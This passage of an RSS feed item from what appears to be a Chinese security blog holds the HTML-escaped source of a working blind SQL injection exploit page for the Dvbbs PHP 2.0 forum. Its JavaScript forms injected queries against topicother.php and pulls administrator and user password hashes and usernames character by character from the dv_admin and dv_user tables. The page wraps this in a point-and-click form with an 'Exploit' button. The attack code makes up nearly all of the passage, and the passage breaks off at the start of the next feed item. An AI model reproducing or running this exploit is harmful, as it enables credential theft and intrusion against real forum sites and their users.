myrefresh()&lt;br/&gt;&amp;#123;&lt;br/&gt;window.location.reload();&lt;br/&gt;&amp;#125;&lt;br/&gt;function makewhat(x)&amp;#123;&lt;br/&gt;var whereto=new Array(2)//新建一个数组，项数为第一个下拉列表的项数&lt;br/&gt;for(i=0;i&amp;lt;2;i++)//循环第一个下拉列表的项数那么多次&lt;br/&gt;whereto&amp;#91;i&amp;#93;=new Array();//子循环&lt;br/&gt;//下面是给每个循环赋值&lt;br/&gt;whereto&amp;#91;0&amp;#93;&amp;#91;0&amp;#93;=new Option(&amp;quot;后台密码&amp;quot;,&amp;quot;0&amp;quot;);&lt;br/&gt;whereto&amp;#91;0&amp;#93;&amp;#91;1&amp;#93;=new Option(&amp;quot;后台用户名&amp;quot;,&amp;quot;1&amp;quot;);&lt;br/&gt;whereto&amp;#91;0&amp;#93;&amp;#91;2&amp;#93;=new Option(&amp;quot;关联前台用户名&amp;quot;,&amp;quot;2&amp;quot;);&lt;br/&gt;whereto&amp;#91;1&amp;#93;&amp;#91;0&amp;#93;=new Option(&amp;quot;前台密码&amp;quot;,&amp;quot;3&amp;quot;);&lt;br/&gt;whereto&amp;#91;1&amp;#93;&amp;#91;1&amp;#93;=new Option(&amp;quot;前台用户名&amp;quot;,&amp;quot;4&amp;quot;);&lt;br/&gt;var what=document.form.what;//方便引用&lt;br/&gt;for(m=what.options.length-1;m&amp;gt;0;m--)&lt;br/&gt;//这个要看清楚,因为要重新填充下拉列表的话必须先清除里面原有的项,清除和增加当然是有区别的了,所以用递减&lt;br/&gt;what.options&amp;#91;m&amp;#93;=null;//将该项设置为空,也就等于清除了&lt;br/&gt;for(j=0;j&amp;lt;whereto&amp;#91;x&amp;#93;.length;j++)&amp;#123;//这个循环是填充下拉列表&lt;br/&gt;what.options&amp;#91;j&amp;#93;=new Option(whereto&amp;#91;x&amp;#93;&amp;#91;j&amp;#93;.text,whereto&amp;#91;x&amp;#93;&amp;#91;j&amp;#93;.value)&lt;br/&gt;//注意上面这据,列表的当前项等于 新项(数组对象的x,j项的文本为文本，)&lt;br/&gt;&amp;#125;&lt;br/&gt;what.options&amp;#91;0&amp;#93;.selected=true;//设置被选中的初始值&lt;br/&gt;&amp;#125;&lt;br/&gt;function submitForm()&amp;#123;&lt;br/&gt;if (pass!=&amp;quot;&amp;quot;)&amp;#123;&lt;br/&gt;alert(&amp;quot;please refresh this page and try again!&amp;quot;);&lt;br/&gt;setTimeout(&amp;#039;myrefresh()&amp;#039;,1000);&lt;br/&gt;return false;&lt;br/&gt;&amp;#125;&lt;br/&gt;var host= document.getElementById(&amp;quot;host&amp;quot;).value;&lt;br/&gt;var userid = document.getElementById(&amp;quot;userid&amp;quot;).value;&lt;br/&gt;//后台&lt;br/&gt;if(document.form.where.value==0)&amp;#123;&lt;br/&gt;var params =&amp;quot;?t=9&amp;amp;action=join&amp;amp;activeid=1/**/and/**/1=(select/**/count(*)/**/from/**/dv_admin/**/where/**/id=&amp;quot;+userid;&lt;br/&gt;&amp;#125;else&amp;#123;&lt;br/&gt;//前台&lt;br/&gt;var params =&amp;quot;?t=9&amp;amp;action=join&amp;amp;activeid=1/**/and/**/1=(select/**/count(*)/**/from/**/dv_user/**/where/**/userid=&amp;quot;+userid;&amp;#125;&lt;br/&gt;var url = host+&amp;quot;/topicother.php&amp;quot;+params;&lt;br/&gt;document.getElementById(&amp;quot;md5hash&amp;quot;).innerHTML = &amp;quot;Exploiting, Please Wait..&amp;quot;;&lt;br/&gt;var p=&amp;quot;temp&amp;quot;;&lt;br/&gt;var w=document.form.what.value;&lt;br/&gt;alert(&amp;#039;Now begin to exploit!&amp;#039;);&lt;br/&gt;sendCall(&amp;#039;1&amp;#039;,&amp;#039;48&amp;#039;,url,w,p);&lt;br/&gt;&amp;#125;&lt;br/&gt;&amp;lt;/script&amp;gt;&lt;br/&gt;&amp;lt;/head&amp;gt;&lt;br/&gt;&amp;lt;body&amp;gt;&lt;br/&gt;&amp;lt;font color=#CC0000&amp;gt;-Dvbbs·php Version 2.0++&amp;nbsp;&amp;nbsp;Blind SQL Injection Exploit -&amp;lt;/font&amp;gt;&lt;br/&gt;&amp;lt;p&amp;gt;&amp;lt;p&amp;gt;&lt;br/&gt;&amp;lt;form name=&amp;quot;form&amp;quot; action=&amp;quot;&amp;quot; method=&amp;quot;post&amp;quot;&amp;gt;&lt;br/&gt;&amp;lt;TABLE&amp;gt;&lt;br/&gt;&amp;lt;TR&amp;gt;&lt;br/&gt;&amp;lt;TD&amp;gt;host&amp;lt;/TD&amp;gt;&lt;br/&gt;&amp;lt;TD&amp;gt;&amp;lt;INPUT TYPE=&amp;quot;text&amp;quot; NAME=&amp;quot;host&amp;quot; id=&amp;quot;host&amp;quot; value=&amp;quot;&lt;a href=&quot;http://www.t00ls.net&amp;quot;&quot; target=&quot;_blank&quot;&gt;http://www.t00ls.net&amp;quot;&lt;/a&gt; size=&amp;quot;30px&amp;quot;&amp;gt;(URL to Dvbbs Php Forum Site: &lt;a href=&quot;http://www.t00ls.net/bbs)&amp;lt;/TD&amp;gt;&quot; target=&quot;_blank&quot;&gt;http://www.t00ls.net/bbs)&amp;lt;/TD&amp;gt;&lt;/a&gt;&lt;br/&gt;&amp;lt;/TR&amp;gt;&lt;br/&gt;&amp;lt;TR&amp;gt;&lt;br/&gt;&amp;lt;TD&amp;gt;userid&amp;lt;/TD&amp;gt;&lt;br/&gt;&amp;lt;TD&amp;gt;&amp;lt;INPUT TYPE=&amp;quot;text&amp;quot; NAME=&amp;quot;userid&amp;quot; id=&amp;quot;userid&amp;quot; value=1 size=&amp;quot;30px&amp;quot;&amp;gt;(UserID of the user you want to get the information)&amp;lt;/TD&amp;gt;&lt;br/&gt;&amp;lt;/TR&amp;gt;&lt;br/&gt;&amp;lt;TR&amp;gt;&lt;br/&gt;&amp;lt;TD&amp;gt;where&amp;lt;/TD&amp;gt;&lt;br/&gt;&amp;lt;TD&amp;gt;&lt;br/&gt;&amp;lt;select name=&amp;quot;where&amp;quot; size=&amp;quot;1&amp;quot; onchange=&amp;quot;makewhat(options.selectedIndex)&amp;quot;&amp;gt;&lt;br/&gt;&amp;lt;option value=&amp;quot;0&amp;quot; selected&amp;gt;后台&amp;lt;/option&amp;gt;&lt;br/&gt;&amp;lt;option value=&amp;quot;1&amp;quot;&amp;gt;前台&amp;lt;/option&amp;gt;&lt;br/&gt;&amp;lt;/select&amp;gt;(front or back)&lt;br/&gt;&amp;lt;/TD&amp;gt;&lt;br/&gt;&amp;lt;/TR&amp;gt;&lt;br/&gt;&amp;lt;TR&amp;gt;&lt;br/&gt;&amp;lt;TD&amp;gt;what&amp;lt;/TD&amp;gt;&lt;br/&gt;&amp;lt;TD&amp;gt;&lt;br/&gt;&amp;lt;select name=&amp;quot;what&amp;quot;&amp;gt;&lt;br/&gt;&amp;lt;option value=&amp;quot;0&amp;quot;&amp;gt;后台密码&amp;lt;/option&amp;gt;&lt;br/&gt;&amp;lt;option value=&amp;quot;1&amp;quot;&amp;gt;后台用户名&amp;lt;/option&amp;gt;&lt;br/&gt;&amp;lt;option value=&amp;quot;2&amp;quot;&amp;gt;关联前台用户名&amp;lt;/option&amp;gt;&lt;br/&gt;&amp;lt;/select&amp;gt;(what do you need,don&amp;#039;t support Chinese username)&lt;br/&gt;&amp;lt;/TD&amp;gt;&lt;br/&gt;&amp;lt;/TR&amp;gt;&lt;br/&gt;&amp;lt;TR&amp;gt;&lt;br/&gt;&amp;lt;TD&amp;gt;&lt;br/&gt;&amp;lt;/TD&amp;gt;&lt;br/&gt;&amp;lt;TD&amp;gt;&lt;br/&gt;&amp;lt;INPUT TYPE=&amp;quot;button&amp;quot; name=&amp;quot;submit&amp;quot; value=&amp;quot;Exploit&amp;quot; onclick=&amp;quot;submitForm();&amp;quot;&amp;gt;&amp;lt;/TD&amp;gt;&lt;br/&gt;&amp;lt;/TR&amp;gt;&lt;br/&gt;&amp;lt;/TABLE&amp;gt;&lt;br/&gt;&amp;lt;/form&amp;gt;&lt;br/&gt;&amp;lt;div&amp;gt;&amp;lt;font color=red&amp;gt;&amp;lt;B&amp;gt;Output (whole username or MD5 Hash of password):&amp;lt;/B&amp;gt;&amp;lt;/font&amp;gt;&amp;lt;span id=&amp;quot;md5hash&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/div&amp;gt;&lt;br/&gt;&amp;lt;hr&amp;gt;&lt;br/&gt;Browser support: &amp;#91;IE7.0&amp;#124;IE6.0&amp;#93; &amp;#91;FF2.0&amp;#93;&lt;br/&gt;&amp;lt;p&amp;gt;&lt;br/&gt;Coded by T00LS.NET&lt;br/&gt;&amp;lt;script language=&amp;quot;javascript&amp;quot;&amp;gt;&lt;br/&gt;var xmlHttp;&lt;br/&gt;var pass;&lt;br/&gt;pass=&amp;quot;&amp;quot;;&lt;br/&gt;function sendCall(i,j,url,w,p) &amp;#123;&lt;br/&gt;if (p==&amp;quot;temp&amp;quot;)&amp;#123;p=url&amp;#125;&lt;br/&gt;//以下用户名暂不支持中文...&lt;br/&gt;//后台密码、用户名、关联的前台用户名&lt;br/&gt;switch(parseInt(w))&amp;#123;&lt;br/&gt;case 0:url = p+&amp;quot;/**/and/**/ascii(mid(password,&amp;quot;+i+&amp;quot;,1))=&amp;quot;+j+&amp;quot;)/**/&amp;quot;;break;&lt;br/&gt;case 1:url = p+&amp;quot;/**/and/**/ascii(mid(username,&amp;quot;+i+&amp;quot;,1))=&amp;quot;+j+&amp;quot;)/**/&amp;quot;;break;&lt;br/&gt;case 2:url = p+&amp;quot;/**/and/**/ascii(mid(adduser,&amp;quot;+i+&amp;quot;,1))=&amp;quot;+j+&amp;quot;)/**/&amp;quot;;break;&lt;br/&gt;//前台密码、用户名&lt;br/&gt;case 3:url = p+&amp;quot;/**/and/**/ascii(mid(userpassword,&amp;quot;+i+&amp;quot;,1))=&amp;quot;+j+&amp;quot;)/**/&amp;quot;;break;&lt;br/&gt;case 4:url = p+&amp;quot;/**/and/**/ascii(mid(username,&amp;quot;+i+&amp;quot;,1))=&amp;quot;+j+&amp;quot;)/**/&amp;quot;;break;&lt;br/&gt;&amp;#125;&lt;br/&gt;if (window.ActiveXObject) &amp;#123;&lt;br/&gt;xmlHttp = new ActiveXObject(&amp;quot;Microsoft.XMLHTTP&amp;quot;);&lt;br/&gt;&amp;#125; else if (window.XMLHttpRequest) &amp;#123;&lt;br/&gt;xmlHttp = new XMLHttpRequest();&lt;br/&gt;//解决FF中跨域问题&lt;br/&gt;try&amp;#123;&lt;br/&gt;netscape.security.PrivilegeManager.enablePrivilege( &amp;quot;UniversalBrowserRead &amp;quot;);&lt;br/&gt;&amp;#125;&amp;nbsp;&amp;nbsp; catch&amp;nbsp;&amp;nbsp; (e)&amp;nbsp;&amp;nbsp; &amp;#123;&lt;br/&gt;alert( &amp;quot;Permission&amp;nbsp;&amp;nbsp; UniversalBrowserRead&amp;nbsp;&amp;nbsp; denied. &amp;quot;);&lt;br/&gt;&amp;#125;&lt;br/&gt;&amp;#125;&lt;br/&gt;xmlHttp.onreadystatechange = function() &amp;#123;&lt;br/&gt;if(xmlHttp.readyState == 4 &amp;amp;&amp;amp; xmlHttp.status ==200) &amp;#123;&lt;br/&gt;var str = xmlHttp.responseText;&lt;br/&gt;//alert(str);&lt;br/&gt;var md5hash=document.getElementById(&amp;quot;md5hash&amp;quot;);&lt;br/&gt;//if(str.match(/&amp;#92;u8bf7&amp;#92;u767b&amp;#92;u9646&amp;#92;u540e&amp;#92;u64cd&amp;#92;u4f5c/)) &amp;#123;&lt;br/&gt;if(!str.match(/&amp;#92;u672c&amp;#92;u6d3b&amp;#92;u52a8&amp;#92;u62a5&amp;#92;u540d&amp;#92;u4eba&amp;#92;u6570&amp;#92;u5df2&amp;#92;u6ee1/)) &amp;#123;&lt;br/&gt;pass += String.fromCharCode(j);&lt;br/&gt;md5hash.innerHTML = pass;&lt;br/&gt;j = 48;&lt;br/&gt;i++;&lt;br/&gt;&amp;#125;&lt;br/&gt;//如果检测用户名，直接使用else &amp;#123;j++; &amp;#125;&lt;br/&gt;else &amp;#123;&lt;br/&gt;if(j == 59&amp;amp;&amp;amp;(parseInt(w)==0&amp;#124;&amp;#124;parseInt(w)==3)) &amp;#123; j = 96; &amp;#125;&lt;br/&gt;else &amp;#123; j++; &amp;#125;&lt;br/&gt;&amp;#125;&lt;br/&gt;&lt;br/&gt;if(pass.length &amp;gt;= 16) &amp;#123; alert(&amp;quot;Exploitation Successfull!. Admin MD5 Hash(or username): &amp;quot;+pass); return true; &amp;#125;&lt;br/&gt;sendCall(i,j,url,w,p);&lt;br/&gt;&amp;#125;&lt;br/&gt;&amp;#125;&lt;br/&gt;xmlHttp.open(&amp;#039;GET&amp;#039;, url, true);&lt;br/&gt;//xmlHttp.setrequestheader(&amp;#039;Content-Type&amp;#039;,&amp;#039;text/html; encoding=gb2312&amp;#039;);&lt;br/&gt;//xmlHttp.setRequestHeader(&amp;quot;Connection&amp;quot;, &amp;quot;close&amp;quot;);&lt;br/&gt;xmlHttp.send(null);&lt;br/&gt;&amp;#125;&lt;br/&gt;&amp;lt;/script&amp;gt;&lt;br/&gt;&amp;lt;/body&amp;gt;&lt;br/&gt;&amp;lt;/html&amp;gt;&lt;/div&gt;&lt;br/&gt;Tags - &lt;a href=&quot;http://tlk.net.ru/tags/dvbbs/&quot; rel=&quot;tag&quot;&gt;dvbbs&lt;/a&gt; , &lt;a href=&quot;http://tlk.net.ru/tags/php%25E7%2589%2588/&quot; rel=&quot;tag&quot;&gt;php版&lt;/a&gt; , &lt;a href=&quot;http://tlk.net.ru/tags/%25E6%25B3%25A8%25E5%2585%25A5%25E6%25BC%258F%25E6%25B4%259E/&quot; rel=&quot;tag&quot;&gt;注入漏洞&lt;/a&gt; , &lt;a href=&quot;http://tlk.net.ru/tags/exp/&quot; rel=&quot;tag&quot;&gt;exp&lt;/a&gt;&lt;br /&gt;&lt;!-- Feedsky flare --&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=c9ae7bcbda6d781b0b8ab9f48bc0d4c1&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=c9ae7bcbda6d781b0b8ab9f48bc0d4c1&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=3f41c5a57965a04d16984c3606604b49&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=3f41c5a57965a04d16984c3606604b49&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=da4fa3778a9492063d5357b108c83f6b&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=da4fa3778a9492063d5357b108c83f6b&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=7c75a4d217a931a2a9eb0295d23fc843&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=7c75a4d217a931a2a9eb0295d23fc843&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=4e44e9ea6edf52e2f5b3f804a4f7a81d&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=4e44e9ea6edf52e2f5b3f804a4f7a81d&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=0164dd21c50e3d2a5bef850178dee975&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=0164dd21c50e3d2a5bef850178dee975&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=12e9186a481c3ae909ec59bf5098b937&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=12e9186a481c3ae909ec59bf5098b937&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;!-- /Feedsky flare --&gt;</description><category>Bug&amp;amp;EXP</category><pubDate>Thu, 02 Oct 2008 10:12:24 +0800</pubDate><author>kok &lt;k@tlk8.cn&gt;</author><guid isPermaLink="false">http://tlk.net.ru/Dvbbs-php-V2-SQL-Injection/</guid><dc:creator>kok &lt;k@tlk8.cn&gt;</dc:creator><fs:srclink>http://tlk.net.ru/Dvbbs-php-V2-SQL-Injection/</fs:srclink><fs:srcfeed>http://tlk.net.ru/feed.php</fs:srcfeed><fs:itemid>feedsky/tlk8/~7114500/120473236/5165305</fs:itemid></item><item><title>大量站点存在PHPMYADMIN漏洞-收集整理</title><link>http://item.feedsky.com/~feedsky/tlk8/~7114500/120191022/5165305/1/item.html</link><description>&lt;a href=&quot;http://www.novarigenerazio